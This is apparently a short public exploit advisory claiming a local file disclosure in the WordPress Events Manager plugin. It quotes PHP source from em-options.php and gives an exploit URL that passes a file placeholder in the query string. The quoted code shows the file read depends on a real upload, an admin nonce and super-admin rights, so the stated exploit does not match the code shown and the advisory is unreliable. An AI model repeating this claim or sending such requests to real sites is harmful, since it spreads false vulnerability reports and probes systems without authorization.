[-] Tile: Wordpress Plugin events-manager - Local File Disclosure [-] Author: mehran feizi [-] Category: webapps [-] Date: 2020.02.12 ============================================================================== Vulnerable page: /em-options.php =============================================================================== Vulnerable Source: 209: file_get_contents $settings = file_get_contents($_FILES['import_settings_file']['tmp_name']); requires: 206: if(!empty($_REQUEST['action']) && (($_REQUEST['action'] == 'import_em_settings' && check_admin_referer('import_em_settings')) || (is_multisite() && $_REQUEST['action'] == 'import_em_ms_settings' && check_admin_referer('import_em_ms_settings'))) && em_wp_is_super_admin ()) 208: if(!empty($_FILES['import_settings_file']['size']) && is_uploaded_file($_FILES['import_settings_file']['tmp_name'])) 4: ⇓ function em_options_save() ================================================================================= Exploit:localhost/wp-content/plugins/events-manager/admin/em-options.php?import_settings_file=[LFD] ================================================================================= contact me: telegram: @MF0584 gmail: mehranfeizi13841384@gmail.com